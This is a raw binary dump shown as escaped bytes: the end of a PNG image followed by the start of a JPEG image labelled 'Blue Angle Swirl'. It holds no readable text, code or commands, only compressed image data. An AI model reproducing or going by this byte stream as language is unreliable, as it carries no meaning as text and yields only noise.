\x9eb\x08\xc4\xc1\xb1\xb9\x89\xda\x1d-\xf4\xe9^\x02\xe1$;\xaa\x17\xf66V\x12\xdc\x98\x91]\xa9\xd6\x0d\xae\x15.\x00w\xbe\x11\xe8\xde\xb1\xa7\x09g\xa9\x9d\xd9\x99\x14\xf3\xf2\xda\x0b'\x19\x8d\xc4\x18\x98\x84TZ\x82\xc8\xa6\x13)\x98\xd4\xed \xe78\x9cv>L\xb8\xd8\xbc\x22%\xe6\xd9I`\xb2\x85'\x00\x10\x04J\x17\x89\x80\xf2\xfe\x0b\xa2\xfb\xb4\xde/\x08\xd84p\x96\xd8Q\x02\x97\xcfE2^\xbfyKu \xa9f\x12f\xaf\xcaE\x90\x22;\xb6\x99d\x96&`\xb5E&\x15)s\x04\x96b\x05\xff]\x91:\x07\x9e\xfa\xf1NJJ\xed\x19\x10;\x1fn\xa2z\xad\x074XS\xeb\x99'\x84\xae\xd6\x00\xac\xcdG\xda5\x1d\xf5,\xa0\xebd:\x9amz\x0a\xcd\xe1\x12v\xb5\x06\xc8w\x19\x17\x14Mn1\x14)\x93\xd8\xb0\x82\xef:\xf4\x93=\x94\x95\xbb@y\x92u\x1b\xbdlm\xf1\xb2\xa3\xd6\xce\x16\xcf\x22\xc5k\xf6\xa4\x9c[[\xaaf\xb5Y\xa3 \x09(\xa1\xd7J@\xed{\xba\x9e\xfc\xd1.\xaaj\xca\x0c;\xca\x0a'<\xee\x83v/|\x9e\x84+\x939\xd2\x05\xc0\xbc\xbd\xc0H\xc2]\xac\xec\x16\xf096\xfa\xd1\xa1\xb1\x9c\x11\xd8W\xbf\xa1\x02_\xa3\xd7\xf0\x0f7{`\xbf\x0fN]\x83c#p\xf3\xb6\xa9\xf3d\x01j\x15\x05\xde\xe3\x80P4\x99\xdf\xe1D\x83\xe9[\xf2\x1c\x9d\x9a\xbb\x05\xe0\xcfF 4+\x9eD\x81`\xbb\x17\xf6\xd6\xc0\x9f\x86\xe1\xeat\xf6T\x81l$\xac\x1en\xaf\x82\xd0H\x12\xbd\xc4\x95m\xb56\xda\x81\xc8\x04\xa4fS\xc4\xc6\xe29\x08\x88\xa3[4\x12\xf7\xbf\xfd\xea\x19\xe6e\x95S\x8e\x91)\x03\x06\x05<\x0f\xf1\x96( 
\x95%\x92\xc0+=\x11\xd6\xae\xf3\x16t,\xec\xbf0(\xc1\x8b\xab\x97\x5cm\xb4\xe3\xc3\xe3A\xe2\xe3It\xe0\x9d\xb0\xec\x18\x0d\xcbQ\xf7;JA_\x1c\xfc\xc1\xcdph\x0b<\xbd\x09\x9e\xb9Gz\xff\xc4H\x01{\x22\xe4N\xe0\xd2\xe9\x00@g\xee.$o\xc8p\xc86\xc9\x9c\x00\xdf;\x02\x0d\xcb\x80\x85\xce\xb5\x18\x89\x01j\x0e\x8cM\xc3[gb\x99\x15\xbbn9\xf8\x831\x9e\xf9\xd5E\x1a\xdb|&\xe4\xea\xfb\x0b\xd9\xc5\xbdQ\xe6\xbaE\xe0\xb3\x9e\x07\xcc\xe7_\xd1F3+\xe6<\x88K1h+7\x02S\xbd\xdf@D\x820\xfd\xed\xe3i\x17\xcf\xfe\x22\xc0\xcct\x8ab\x87\x9d\x96\xbd[\xb1\x17\xdb\x89\xdfH\xb2\xdc\xed2\x82\xc5*\xc1\xf3\x03\x5c:\x15L\x00\x07\x00r\x13\x80\x8e\xb6\xed>\x05B\x03\x80p\x12\xec\x1a\xcc\xa5\xa5I\x01T#Y\x22R\xec\xb4\xb3\xed\xc1&\x15\xb9\xb4\x1cC\x9f\x8e\xd1|\x9fK\x81\xc6\xfc\x0ey\x05y\xe2\x9d>\xcc\x17]\xb9j\xa0\xfb\xc4\xf1`\xe2_=\x01tT\xca|:\x01kJ\x91 \xd2\xa6Q\xa9\xaa\x0fr\x10\x03\xce\x9f\x1e\xc0\xa9\xbco\xf8\xce\xbc\xed\xba\x00\xffVW\x0f\xa2u\x1ePwC\x8bG\x00\xf7\xcaR\xf7\xc6\xd6jCN\x0e'aG\xa5$\xa2\x99\xf2U\xdd\xbeYU\x01W\xf3\xd9\xe9\x14\xc7\xde\xec\xe3\xe9\x9f\xee\xe3\xb6.\xd3\x11\xd33\xd7\xa31\xba_\x10\xe0g\x05x\x95\xf7y\x11\xa8\x13\xf9\x8f\xbb\xcce)\xaa\xd9\xdb2\xfc\xbaf\xb0\xe7$\x81)\x22\xa2\x0ex\xf1\xb7=\xb8\xdc.\x8a\x1c\xf6\x0c\x81\x22S\x04\xe6fR\xbc\xf9|\x06|\x97\x02\x9f?\x81\xde\xd1H<4\x12\x8e\x89s@\x99\x01gbN\x81\xc2\xccA\x11\xc8\xa6\x12\xfcoz\x18\xbb\x1a\xa7\xe3\xb1m\x19\xdbm\x09\xc0\x10\xa57\xfe\xf0\x05\xf8\xef\x91Ur\xb7\xd1P||*\x03@\xe5\xba\x8c@Z\xb7\xa8\xaa\x83tv\xf0\x81\x0ba~}\xa4;\x03\xbe\xed\xa1f6\xdc\xdb@Z\x163\xb7U\xa48\xf5\xde\x05Q\xb8q\xbf\xe1\xf0^`\x04\x00\xdc\xa2s\x08P\xc6;\x9d\xd0\xa4i\x9fc\xe9D\xd6\xc5\xees\xd1iz\xdf\xbe\xc0\xd0g\xd7\xf0\xd6U\xf0\xc0\xb7\xdbY^\xe6\xca\x00\xb7\x81\x8c\x82\x06E:L\xc4\x93\x9c:~q\xbe\xe3L\xfc?\x04\x12\xa2\xd0T\xbah\x12\x8c\xa6\xa9T1\x8a\xb5P\x03\xe7\xc3|\xf4^\x80\xa1O\xafQ\xdf\xe2c\xcf\xd3-\xac\xae\xf7b\xb3\x19\x8b;\xad\xab\xab\x11\xff\x89\x00@\x97\xb5]\x16N\xa0\xebo\xaf\xf7u\x88(P\xbf\xdek\xb9\xb02\xd6\xb0\xfa\x10\x8d\xc4\xf0\x9f\x1c\x14\xe0#,u\x95R\xdf\xec\xa3\
xed\x9b\xbb\x10\xef\xc1\xa6\xa1R\x12%\xb6\x0c\x19\x19\x85\x81\xcb\x11\x80n\x0a\x14-\xcb\x91\xf2[@\xe7\x8a\xb2\xd2:A\x02\xd1Z\xa9\x13ce\xb5\x07 sFN\xc4\xa6\x10\x05O\xa8\x7f,\xb3(\x95\xae\xf4P\xb3\xc5\xc7\x9a\x0d5\xd8%hl\xea\xb8\x89\xa6\xe6J\xd5E\x18\xcf\xfe\xece\x80\xbaB\x7f'\xd3\xf2\xf8U\xa6\x03hUj\x14Ou\x05\xeb\xb75\xb3\xaa\xd6\x8b\x04\xa9-\x04\xd0J\xc8D\xe6\xb9\x9f\xbf\x8c\x00\xafQ\xa0,%\x97\xc8|<o\xfa\x81\xef0p\x04`\x95\xaf\x9a\xd6o\xec\xcc\x00P\x85\xa9\xa3\xa3\x91\x06\x906K\xce\x03\xd8\xd2\xa0\xdb\x90v\xd4\xfbe\x01\x17B\xa0\x10\x91/?*\x88t\x03\xbd5\xf74\xba\x0dE\xa9*\x1a\x1b\x1a\xba\xae\xec*\xe7\x91*I\x9b{y+\xf0>\x05\x88\x8dBEE\xa6s\xd8\x1fD7\xad\x09J\xf5,v\x16\xb4W\xd6\xa9[\xb7\xbbK@I\xe7\xf8\xe7\x11\xc4Q//\x80\xe9E\xeck7\xd6\x00\x1c\xf8r\x08\xa8t\xea\x8dG\xc6\xac\x00\x0b\x8f\x025M\xd52\x02\xe2v\xe4\xee\x13P\xe2\xbf9\x9eX\x04\xa0\x9eW\x14J\xdd.\xca*=\x00\xfb\xbeL\x02\x89\xdbs\xa9<\xd2G\xcf+\x0a^Y\x07\x1dw\xaf\x0bY\xa5w40Hr<n\xb9N\xb1^\xadd\x99\xab\xcf\x88s/@\x82\x02\xe4?\x98\x19M\xb7\xfe\x5c\xef{\x00\x00\x00\x00IEND\xaeB`\x82\x00\x00.2\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00H\x00H\x00\x00\xff\xdb\x00C\x00\x04\x02\x03\x03\x03\x02\x04\x03\x03\x03\x04\x04\x04\x04\x05\x09\x06\x05\x05\x05\x05\x0b\x08\x08\x06\x09\x0d\x0b\x0d\x0d\x0d\x0b\x0c\x0c\x0e\x10\x14\x11\x0e\x0f\x13\x0f\x0c\x0c\x12\x18\x12\x13\x15\x16\x17\x17\x17\x0e\x11\x19\x1b\x19\x16\x1a\x14\x16\x17\x16\xff\xdb\x00C\x01\x04\x04\x04\x05\x05\x05\x0a\x06\x06\x0a\x16\x0f\x0c\x0f\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\x16\xff\xfe\x00\x12Blue Angle Swirl\xff\xc0\x00\x11\x08\x01 \x01 
\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xc4\x00\x1b\x00\x00\x02\x03\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x07\xff\xc4\x00=\x10\x00\x02\x01\x03\x03\x03\x03\x02\x04\x04\x05\x02\x06\x03\x01\x00\x01\x02\x03\x00\x04\x11\x12!1\x05AQ\x13\x22a2q\x14B\x81\xa1\x06#R\x913b\xb1\xc1\xd1r\xe1\x15$4CS\xf1\x82\x92\xa2\xf0\xff\xc4\x00\x19\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x06\xff\xc4\x00$\x11\x01\x01\x00\x02\x02\x02\x02\x02\x02\x03\x00\x00\x00\x00\x00\x00\x00\x01\x02\x11!1\x12A\x03\x22Qa\x04q\x132B\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00?\x00\xf6:\x14\xae\xdf\xa5tZ\x84\x80g\xf5\xa2E\x83\x10\x149P\x83\xa8W\xdeo|<\xad{\x16\x08\xe1\x98\xe4\x0d\xea\xd7\x0f{y'\xb1N\x91\xc1c\x81JX\xcb\xae.FF\xd4\xcbJt\x80\x18\x81\x8e\xd5\xce\xceD\xc33\xdb\x5c\x8bk\xd8\x90)\xdbV8\xad\x8f\xe1\xebH\xa4\x96\xe0\xb3e\xedp\xf1o\xe7\xbde\xcb\xa2\xfa\xdcC1\xc4\x80{\x1c\xf7\xf8\xaat.\xa1-\x87Y\x81g8\x5c\xfaR\x13\xe0\xd6r\x96\xce\x15\xbaIbNs\x9a\x82\x1b\x1b\x0c\xd7]\x0fJ\xe5\xd4p\x1bj\xbc2\x03\x5c\x94[\x1b\xd7\xb7q\x9c\x80<V\xf5\xbc\xd6\x9dJ\xdc\xc7!]dcq\xcd`\xe1I\xc1\x00\xd0=f\xb7\xba\x0d\x1b\x15\xc5c,<\xba]\x8b\xd7\x7f\x86\xe6yI\x86\x5c\xaf\xf4\xb1'\xfbW\x9c\xbf\xe8\x1dF&\xff\x00\xd2\x93\xbf*2\x0d{\x15\xeb\x8c\xb1a\x86\xb3\xe2\x83q\xd5/%\x1b\x15\xb7O \x02kx|\x9f$\xed5\x1eA:?Z\xcf\xb2\xdel\x0af.\x83q\xf5^^*yT:\x9b\xfe\xd5\xb5-\xd1l\xeb\x9ayI\xe7.@?\xa0\xa5.\xe6\xd3\x11'\x00x\x1b\x0a\xe9\xfeL\xaah\xb46\xd6VyhSS\x0f\xfd\xc9\xb0H\xfb\x0e(77\x99$G\xb9?\x98\xd2\xd7\x13<\x8d\x96;\x0e\x07j\x0e\xa2\xc4\x84\xed\xcb\x1e\x05jc\xbe\xcd\xa6W$\xff\x00S\x1a]\x08\xfcHU\xdc( 
\x91\xc6k\x9aS!0\xdb\x9f\xfa\xe4?\xedG\xb3\x80*\x0f\x03\xf7\xae\xd8\xe2\x8b^\x82\xcb\xa8r0\xc2\xb4z\x04\xe0\xb9\x8c\xf12\xed\xf7\xa4\x9b\x06E]\xb7\x04\x1a\x1fL\x90\xc6\xec;\xa1\x0c?\xde\xb1\xf2b\xb0\xff\x00O\x96[k\xd6d$4m\xb8\xad^\xbba\x0fW\xe9\xdf\x8b\x81F\xac{\xc0\xec|\xd2\x11(\xff\x00\xc7\xb3\x8fl\x8a\x18V\x9d\xa4\xad\xd3\xaf\xb3\x8c\xc1&\xcc\x0f\x02\xb8g=\xce\xd6<\x05\xf5\xb3\xdb\xceT\x82\x08<\xd5\xed\xa7\x0d\xec\x93\x9e\xc6\xbd\x97\xf1\x8fEI\xa1\xfce\xa8\xd4\x8c3\xb7j\xf0\xf7\x114r\x10F\x08\xae\x98g2\x89a\xc3\x1b!\xd4\x99\xda\x8dmx\xeapM)eu\x8cG!8\x1c\x1e\xe2\x98\x96-^\xe0FO\x04p\xd5\xaf\xed\x1aP\x5c\xa3\xe3|\x1a\xd0p\x9dB\xcf\xd1\x94\x81\x22\x8fk\x1e\xf5\xe6\x15\x9a7\xc3\x0a\xd1\xe9\xf7c 3}\x8dc,=\xac!}o%\xad\xc3G\x22\x91@5\xb9\xd5\xa0\xf5\xe12\xa9/\x8eW9#\xe4V#\x0c\x1f\x22\xba\xe3\x97\x94\xfd\xa0S.\xda\x87\xebS\x0bgcW>(2.\x96\xa7@\xd5YP2\x13\xc3\x0e\x0dB>v<\xd5\xea\xca\x15F\xd2A\xee\x0f\xbb\xe6\x9a\xceTPn#\xdfX\x1fqSl\xd9]>8\xa7\xb0\xca9\x0a(\xd1\xb0u\xc1\xa5\x90\xfbjU\x889\x154\x0b\x1b\xb4\x12\x1cn\x0d2\xf2\xfa\x91jC\xc74\x90\x93\xce\xf51\xbe\x96\xd4\xa7O\xc7\x9a\xa1\xc8.\x08 7\xf7\xa6oB]B\x1f\xff\x00qy\xc7\x7f\x9a\xcf$7\xb9v\xf2(\x96\xf3\x18\xcf\x91R\xcd\xf3\x07\xa4\xb0\xb9\x17v([\xfch\x94$\xbf$pj\xcc\xfa\x06\xdc\xd6oJ`n}T\xc8\x050\xfe\x0f\x8a~\x1c\xcd7\xf9Ep\xb3U\xa3V\x84\xe8,\xdd\xe9y\xcbKq\x85\xa3\xce\xd8Q\x1a\xf3P\xa0B\xbbn\xe7\xf6\xacJ%U 
\x5c\x9fs\x9e\xd46,\xe7,j\x0e\xe7,rM\x02\xee\xe5b^w\xadH\x09q*B\xb9cY\x17\xb7&F\xcb\x1c\x01\xda\xab4\xf2M6\x95\x05\xd8\xf0\xa2\xa6T\x86\xcd=k\xc6\x0c\xff\x00\x961]1\xc7ICTf\x8c\xc9+zQ\x0e\xe7\x93\xf6\xa5Y\xde\xed\xbd\x1bq\xa2\x15\xfa\x9b\xcf\xc9\xae\x06\xe7\xab\x5c\x12\xcd\xa2\x14\xe4\xf6\x02\x9dQ\x1f\xa6!\x81q\x12\xf7\xc6\xec|\xd7Y5\x7fh\x1d\xbcJ\xab\xa21\xfc\xb1\xdc\xf2\xd4s\x80+\x80\x00`T\x10Y\xc2/&\xba[1\x82\xf0\x8d\x11=\xc1;\xfd)\xf74\xa5\x87\xfe\xa0\xb7\x81LuwX\xd1-\x97\x88\xc6\xff\x00$\xf3\xfbP\xec\x10\x8bv~5\x9d\x22\xb8\xce\xb7F\x829\x8eKw'\xe8\x90\xc5\xfaV\xfd\xdcBH\x06\xaf\x15\xe7/\x09\xf4\xe5E\x180\xb8p<\xed\x8a\xde\xb1\xb9\x17\x1d=]O\x22\xb8\xd6\x97\xe8wK\x04\xa6\xca\xe7\xdd\x0c\x9b\x0c\xf6\xac/\xe3\xbe\x86m\xa47\x10\x8c\xc6\xdb\xe4v\xa7\xa7t\x92M\x07f\x1cV\xb7J\xb9\x8e\xfe\xcd\xba}\xe0\x05\x80\xc0'\xbdc)p\xbeP\xed\xf2\xe9\x10\xe7\xc1\x14k+\xa3\x19\xd0\xfb\xa9\xe4V\xb7\xf1wF\x93\xa7^\x91\x8fcn\xa6\xb0\xd9s\xf7\xafF6e6\xcb`\xc5\x1c\xb0\xeaV\xf5\x13\xcf\xe6O\xbd&\xea\xf0\xc9\xff\x00\xfb\x06\x81eu%\xbc\x81\x94\xef\xdcy\xad{u\x82\xf6,\xa6\xcd\xdd?\xe2\xafB\xbd:\xf7Kibt\x9e\xc6\x96\xea\x90\xfas\x97M\xd1\xf7\x15\xd7v\xb2@\xdb\xe7\x03\x83\xe2\xba9\xf5'\xa5.\xea{\xf8\xa9';\x8aV\xa1\x940\xc1\xa2O\x19\x8d\xbc\x83\xc1\xaaV\xfb@\x1dJ\x9a$M\x91\x83\xcdY\xc6\xa1\x8a\x0b\x02\xad\x8a\xcf@\xf4\x004N\x07c\xc5\x12&\xc8\xdf\x91Q8\xf6\x83\xdc\x1d\xabB\xd1\x1c\xc6\x0f\xc5Z\xad\x14y_\x00Qmm\xa4\x9e]\x11.q\xcbv\x157\xa0\x1cW\x11Z\xb0\xdaZE\x81#\xeb=\xc8\xe0P\xfa\xa5\xad\x9b\xd9\xbc\xd06\x1e=\xf65\x9f.Fz\xb1\x06\x8c\xbe\xecc\xbd.75\xa5\xd3\xe2\xc6$a\x9e\xca<\xd6\xf7\xa9\xb1\xa1d\x86+u\x84\x0f{nkR\x15\x10\xc2\x14}]\xe9{\x08=!\xea>\xee\xdf\xb5\x1ai\x12$.\xec\x00\x15\xe5\xca\xee\xb4\xb6t\xfb\x8e3\xf3\xda\x95\x9a\xed\x03\x15\x07&\xb3z\x8fT\xf5\x9c\xa4\x1cw4\xbc\x0d4\xaf\xe9\xc2\xa5\xdc\xf7\xf1[\xc7\x0f\xcam\xa5qz\xb1\xa7\xb8\xeex\x14\xb2Cs|\xda\xc8\xf4\xe3\x1c\xb3m\x9f\xb51o\xd3\xe1\xb6O\xc4_H\x19\x80\xce\x93\xc0\xac\xee\xb3\xd6\x1a\x5c\xc7o\xedN6\xef[\xc6n\xf0\x0dy\x7fi\xd3\xa21Z\x
80\xd2p^\x91\xb2\xb4\xb8\xeaR\x9b\x8b\x97+\x109fo\xf6\xa2t\xae\x94e_\xc6^\x9d\x10\x8d\xc0<\x9ab\xf2\xef\xd6\x22\x18WD+\xc2\x8e\xf5\xbe'\x18\xa2\xd34l\xa2\xde\xd9tB\xbf\xff\x00_&\xae\x83\x02\xa9n\xbe\xc2H\xde\x99\xb4Mr\x80x\x15\xac5&\xc0\xd9J\xe3;f\x8d\xd1\xd45\xc9s\x8c.\xf9<Uo\x94\x89\x08\x1b\xed\xb0\xabt\xdftr\xc4\x83.\xeaB\xfc\xd6~K\xb8\xb1\x99z\xfa\xe6$\xf2w?\xae\xf4\xefO\x02k\x06\x88\x11\xad\x0e\xa0;\x91I\xde\xc4\xc9!l\x1c\x1f\xda\xa9\x04\xcf\x14\x81\x91\x88#\xb8\xa5\x9b\x9c#]\xd9eU\x98\xf3\xa4\xa4\xa3\xc7\x83Q\xd1o\x0d\xab5\x9c\xa7\x83\x95>hv\xb3\xfa\xe7\x5c`,\xc0{\x93\xb3\x8a\xa5\xf4bxC\xc4\x08d\xfaGq\xf1\x5c\xf5\xea\xa8\xf7S\x7f\xe7\x0e\x0e\x0f\x22\x9d\xb7\x94\x9d.\xa7\x12.\xe3\x1d\xeb\x06+\x86yW_\x22\xb6\xd2&\x0a\x1dj\xd9\xc25\xae\x84=s\xa55\xbc\x98\x13(\xf6\xe7\xcd|\xff\x00\xa9\xdaImt\xf1:\x90\xcaq^\xb5$x\xe4\x13Dp\xc3\x91U\xfe&\xb5\x8b\xa9\xf4\xf1{\x12\x8fY?\xc4\x03\xfdk\x9e?K\xafK\xdb\xc4\x91\x93\xe0\x8a-\xbc\x8f\x1b\xeb\x8c\xe0\xaf\x22\xa6\xe62\x18\xb61\xbe\xff\x00\x06\x85\x93\xc8\xd9\x85wG\xa1\xe9\xd7\xb0^\xc5\xe9\x5c\xe3Q\x18\xcd\x07\xa9t\xb7\x84\x17\x8f\xdc\xb5\x8f\x0b\x1c\xfa\x91\xecG\x22\xb7:GU\xca\xfaSn\xbc\x1c\xf6\xacYg1Y\x8a\xe5F\x87\x19_\x07\xb5RT\xc7\xb9NT\xfe\xd5\xb7\xd4l\x22\x99=XO#;v\xac\x89c\x92\x16\xdf\x8f\xd8\xd5\x99J\x00qP\xca\x18U\xe4P\xe0\xe3b{R\xec%\x8c\xf3\x91[D\x10U\xaa\xe4\x87\x88\x82w\xc5A\x91X{\x81\x1f5A\xb9\xd2\xa7$\xf3\x8e\xd5\x06\x85\xad\xbc\xf7\x0e\x120O\x93\xd8V\x86\x16\xda\x1f\xc3\xc4v\x1b\xbb\x7fQ\xa2Mtth\x8dDk\xe1k>\xeau\x8dy\xdf\xb0\xac\xf3E/g#\xd8\x9c\x9f\xda\x84\x87E\xb3&\x7f\xc4`O\xe9\xff\x00z\xa2\xe5\xdbSr\x7faW\x0ae\x93\x0a6\x1b~\x95\xad\x02YE\xad\xb5\x1e\x05z\x0e\x97k\xa0\x09$\x1b\xf6\x1e(=\x16\xc8*\x89d\x18\x03\xe9\x15n\xb3\xd5b\xb3\x8c\xa2\x1dR\x9e\x14W,\xb2\xf2\xba\x8ak\xa8^\xc1i\x09y\x1c|\x0a\xf3]C\xa8O}&\x01+\x1f\x81A\x93\xd7\xbc\x98\xcdpN\xfd\x8f\x02\x8a\x88\x89\xc6\xf5\xac0\x90\xb5X\xd4(\xda\xb6lgK.\x91\xeb\xaeK75\x94\xdaH\xd8`\x8e\xd4y\x98\xc9\xd1\x1a4\xdd\xa3l\x91\xf1V\xcd\xa1K\xfb\xfb\x9b\xd9\xb1\xb9\xcf\
x0a+G\xa1\xf4u\x8d?\x17}\xed\x0b\xb8S\xda\xa9\xfc-\xe8\xc3i5\xcc\x8a\x09C\xb5W\xa8_\xcftp\xcd\xa5;(\xe2\xb5\x95\xbf\xeb\x8a\x89\xd5\xaf\x8d\xcb\xfah4\xc2\x9fH\xf3K\xda\xa8-\x93\xbd\x06\x8bjH\x93\x03\xbd5\xa8\x8d(\xc0\x10\x1csF\xb5\x1ac\x04w\xe6\x87\x18\xfeA\xc6\xe4\xd5\xa1`#\xd2\xd9\x07=\xc5I\xce\x22\xf3\xa3;z\x88w^\xd4\x04VW\xf5!\xdb\x07:{\x8f\xfbS\x0a{\x83P\xe8\xaf\xee\xc6\x0f\x91Ie\x9a\xa2M\xcc\x17cM\xca\x80\xc7mc\x9f\xd7\xcd#\x7f\xd3\x9e/|d2\x1e\x08\xe2\x98\x91?\xf9T\x91\xfdK\xfe\xf50\xc9$\x1b\xaf\xba3\xb1\x07\x8f\xfbT\xf1\xb8\xf42Q\x9e7\x04\x12\xac\x0di[\x5c\x89\xfd\xf8\xc4\xa0{\xc0\xfc\xc3\xcf\xdcS\x12ZZ^\xc7\xa9\x1b\xd2\x93\xc1\xe0Vm\xd5\x9d\xd5\x9c\x81\x8a\xb6\x01\xc8q\xc5]\xcc\xb8\x14\xbb\x88Gx\xa5~\x97 \x8a\xf5\x16\xc8\x7f\x0a\xa0\xef\xb5y\xf9\xff\x00\x9bm\x1c\x9apC\x83\x8f\xd6\xbd\x1c\x8e\xb0\xdb.\xa3\x8d\xaaw\xc2\x95\x99t\xb6\xa5\xe3\xbdV)\x0c2kM\xd5\xb6e\xf3K~,\x89\xcft&\x99\x5c2\xecr\x0f\x15s\xc3I\x19=r\xc1A7\x10\x8c\xc6\xdfP\xac)\xe2)!\x1f\xd8\xf9\xaf^\xe0\xa8*FT\xf2+\x17\xaa\xd9{HQ\xf4\xee\xb51\xba\xe2\xab g:\xd3f\x1f\xbd\x11\x18\x91\xeaG\xed#\xea\x1e(d\x10r9\x15(H>\xacx\xd49\x1ek]#O\xa6u\x16\x88\x81\xfd\xd4\xf7\xad]\x16\xf7\xb1\xe6-!\x8f(x5\xe70\xb3!\x92-\x98}I\xe3\xedD\xb4\xbax\xdcd\x90Gz\xc6X\xef\xa5\xd9\xcb\xbb\x07G:F\x0f\xf4\x9f\xf64\x9b\xa1S\x86\x04\x1f\x06\xb6\xed\xaf\xe3\x99\x04w*\x08\xfe\xaa\xbc\xb6\xaa\xf1\xe6\x16Y\x13\xfaX\x03Reg\x14\xd3\xce\xb4(N\xe9\x9a\x95\x8c(\xd9@\xadv\x86\x048{U\xcf\xfdG\xfej\xd1\x0b5\x1b\xda)?;\xff\x00\xadk\xcb\xf4\x8c\xeb\xcb\xa0\x9e\xd5\xdc\xd2cS6\xa6\xdc\x9e\x05F4\xeerX\xd1\x10\x15\x1f\xe7m\xbe\xc2\xb4,\xa0\x9fb\xeeO&\xb6\xba?O\x0a\xa2YF\x07 \x1a\x17D\xb1\x1a}i\x86\x00\xdfz\xa7X\xea\x85\xc9\xb7\xb5`\x14l\xcf\x5c\xf2\xb7+\xe3\x14n\xb5\xd5\xc4G\xf0\xf6\x9e\xe7\xe0\x91\xc0\xac\x84L1\x92f\xd6\xe7\x92j\x8b\xa5>\x9d\xc9\xe5\x8dv\xe4\xf9\xad\xe3\x8c\xc6 \xad\x22\x8f\x9f\xb5tw\x01[>\x98\xa1\x84cS\xe9\x9a\xd0`\xb42n\x87Kx5\xd1;E 
a\xfa\x8e\xc4R\xc5\x18v\xa9I\x19v;\x8f\x06\xa5\x0dZ\xca\x96\xd3\xba\xe3\xf9\x17\x1b\x7f\xd0j\x92!G(\xdc\x83UR\x8e\x84\x1d\xd4\xecGqP^P\x00u\x12``08?\xad \x9a\xea\xa9s\x9f\xa4/\xdc\xe6\xaa\xf2\xf6]\xf3\xe3j\xa0\xe9,\x88vr(\xa9\xd4%]\xb5\xa9\xfb\xd0-,\xaen\x9b\xd8\xa4\x0f4\xf1\xe90B\x99\xb8\x98\x06\xac[\x8a\xba\xde\xf9Y\x80u\xd0O\xe6\x1c~\xa2\xb5\xba\x5c\xd13zR(:\xb8>k\x15m\xed\xd9uB\xe2H\xf5i$\x0c\x154x\x01\x82q\x10>\xd25!\xf1\xe4R\xea\xc1\xadum\xa3-\x1e\xe9\xdc\x1e\xd4\x9bFA\xd5\x16\xc7\xba\xf9\xadKY=X\x15\xfb\x91\xbd\x0e\xea\xd87\xba1\x83\xdcy\xa9\x8evqM3\x15\x036\x13\xf9o\xe38\xfe\xd5u\x92\xee\x0c\x86RW\xbe\xa1\x90j\xd2\xc6\xad\x90\xc3\x07\xcdB,\xf1\x9cG.\xdfz\xde\xb1\xa8\xe8\x90O\x22\x96A\x1cJC9\x19\xc0\xc1\xff\x00\xb5[\xaa\xde~&\x5c&B\x0e\x07\x9a\x1c\xe2w\x04\xc8\xd9\x03\xb5/\x82Mo\x0cd\xe4vh\xb6\xd3\xb4g\x19\xdb\xc5\x0c!\xc5T\xeck[\xd8\xd3GY\x13;\x1a\xa4\xb1\x87\x5c\x1f\xd2\x92\x8aFC\xb1\xa6\xa1\x9c0\xc1\xaeya\xee\x11\x87\xd6\xad=\x19}E\x1e\xd3\xcdg\xee\xac\x19\x7fQ\xe6\xbd]\xf4\x0b4,\xa7|\x8d\xab\xcd]Db\x98\xa1\x18\x19\xa99\x80~\xe0D\xd0\x9c0\xe6\x8c\x81.\xd0\xbc`,\xa3\xeaO?\x22\x802\x8cX~\xa2\xac\xcau\x09\xa08a\xbe\xd5\x9e\x95h\xa5x\xce7#\xb8\xf1Z\x16\xb7^\xd0Q\xc8\xfbR\xf1z]A=\xb8\x8e\xe4r\x0f\x0f\xff\x00zY\x95\x92B\xa4\x14q\xcd^\xd1\xb2n\x19\xc6\x19\xb3Tg\xf9\xac\xe8\xee\x99v\x90\x03\x8a\xe9\xae\x98\x8d\x09\xde\x9a\x02M\x8f\xa8\xe3\x7f\xca+K\xa3Yz\x8d\xebK\xb2.\xfb\xf7\xa1t\xbb6\xb9\x93\xd4}\xa3Z'V\xbf\x04~\x16\xd8\xe1\x06\xc4\x8a\xcd\xb6\xddEOY\xea\x1e\xa1\xfc5\xb1\xd2\x83fa\xde\xb3\x94``\x0a\xe4^\xc2\x89\x1e\x95\x18\xc1cZ\x92c\x11\x09\x19=\xa8\xa9\x1a*\x92\xf2*\xe2\xb8%\xc3\x0c\x05 
\x1f\x1bU\xe2\xb1b2\xd5.J\x13\xcb\x18\xda5g>x\x15F\x9aa\xc4H?\xbd0b\x0b\xb2\xf0*\x0a\x8a\x9b\xd8B\xe2\xea\xe25\xd5\xe9\xa9\x03\xe2\xafew\x1d\xda\xee\xba\x1b\xef\xb5\x1ax\xc3)\x04g5\x94\x0b\xf4\xee\xa0\x1c.\xa8\x89\xf7)\xaa\x8dW\x89\xd1\xb6\x06\xaaY\xf8$\xd6\xad\xb41\x5c@\xb2\xc6uD\xe3+\xe4Q\xbf\xf0\xd4,\x08bEO9\xedt\xc5H\xdeC\x809\xadn\x99\xd2\x81\x02I\xb6\x14\xed\xbd\xac6\xe9\xa9\x80\xda\x94\xea\x9dL\x05)\x19\xc0\x1d\xeb7+\x97\x10\x1e\xfa\xfa\x1bH\xbd80\x08\x1d\xab\x0a{\x89\xef'\x08\xb9%\x8e\x00\xf3A\x96G\x9aL\x0c\x9c\x9d\x85otN\x9e-\x13\xd5\x94\x03+\x0f\xff\x00QZ\xd4\xc6\x1d\xa6\xde\xd1mmb\xb6\x1b\xbc\x8e\x0b~\x95^\xa6\xbe\x93FA\xfa\x1cSv-\xeb]\x1b\x83\xc0\xf6\xc7\xf2;\x9aW\xae6[\x1d\xcb\x8a\x98\xf6V\xaf@`IC\xc0j\xd6\x9e\xde2\xd8V\xd2\xde\x0dct\x13\x8b\x96\x1f\xe6\x14\xff\x00^\x94\xc7&T\xefY\xcao 